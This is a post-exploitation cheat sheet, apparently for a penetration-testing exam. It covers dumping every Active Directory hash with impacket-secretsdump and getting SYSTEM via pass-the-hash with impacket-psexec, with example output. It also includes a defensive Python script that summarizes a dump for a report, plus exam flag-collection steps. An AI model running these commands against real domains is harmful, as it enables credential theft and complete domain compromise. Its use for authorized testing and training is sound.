POST-EXPLOITATION (AFTER DA)

Dump all hashes

Every account hash in domain — Complete compromise

impacket-secretsdump <domain>/Administrator@<DC_IP> -hashes :<hash>

Example Output
impacket-secretsdump corp.local/Administrator@10.10.10.5 -hashes :31d6cfe...
Administrator:500:aad3b...:31d6cfe...
krbtgt:502:aad3b...:f3bc61...
john.smith:1001:aad3b...:8846f7...
(1247 accounts dumped - full domain compromise)
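
For the report's remediation section, the dump can be reduced to findings without copying any hash into the write-up. The Python below is an added example, not part of the original cheat sheet or of Impacket; `summarize`, the sample accounts and their hashes are constructed for illustration, and the two EMPTY_* constants are the well-known LM/NT hashes of an empty password.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty string: LM placeholder and blank NT password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One NTDS line: [DOMAIN\]user:RID:LMhash:NThash[:::]
LINE = re.compile(
    r"^(?:[^\\:]+\\)?([^:\\]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32})(?::::)?\s*$")

def summarize(dump_text):
    """Turn a dump into remediation findings; hash values are never returned."""
    rows, by_nt = [], defaultdict(list)
    for line in dump_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue  # banner, status and Kerberos-key lines
        name, rid = m.group(1), int(m.group(2))
        lm, nt = m.group(3).lower(), m.group(4).lower()
        rows.append((name, rid, lm, nt))
        by_nt[nt].append(name)
    return {
        "total": len(rows),
        # RID 502 exposed: the krbtgt password must be reset twice
        "krbtgt_exposed": any(rid == 502 for _, rid, _, _ in rows),
        "builtin_admin": [n for n, rid, _, _ in rows if rid == 500],
        "machine_accounts": sorted(n for n, _, _, _ in rows if n.endswith("$")),
        "blank_password": sorted(n for n, _, _, nt in rows if nt == EMPTY_NT),
        "lm_hash_stored": sorted(n for n, _, lm, _ in rows if lm != EMPTY_LM),
        "shared_password": sorted(sorted(v) for nt, v in by_nt.items()
                                  if len(v) > 1 and nt != EMPTY_NT),
    }

# Constructed sample (fake hashes), shaped like the output above.
SAMPLE = "\n".join([
    "[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)",
    f"Administrator:500:{EMPTY_LM}:{'1' * 32}:::",
    f"Guest:501:{EMPTY_LM}:{EMPTY_NT}:::",
    f"krbtgt:502:{EMPTY_LM}:{'2' * 32}:::",
    f"corp.local\\john.smith:1001:{EMPTY_LM}:{'3' * 32}:::",
    f"corp.local\\svc_backup:1105:{'a' * 32}:{'3' * 32}:::",
    f"WS01$:1110:{EMPTY_LM}:{'4' * 32}:::",
    "[*] Cleaning up...",
])

if __name__ == "__main__":
    for key, value in summarize(SAMPLE).items():
        print(f"{key}: {value}")
```

Each key maps to a report finding: krbtgt and RID 500 exposure, accounts with a blank password, accounts still storing an LM hash, and groups of accounts that share one password.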

Access any machine

SYSTEM on any domain machine — Prove impact for report

impacket-psexec <domain>/Administrator@<target> -hashes :<hash>

Example Output
impacket-psexec corp.local/Administrator@10.10.10.20 -hashes :31d6cfe...
C:\Windows\system32> whoami
nt authority\system
(SYSTEM on any machine in the domain)

Flag collection

Exam flag files — Screenshot with whoami & ipconfig

type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\<user>\Desktop\local.txt

Example Output
type C:\Users\Administrator\Desktop\proof.txt
<flag_hash_here>

SCREENSHOT MUST INCLUDE:
- The flag content
- whoami output
- ipconfig output
- All in the same terminal window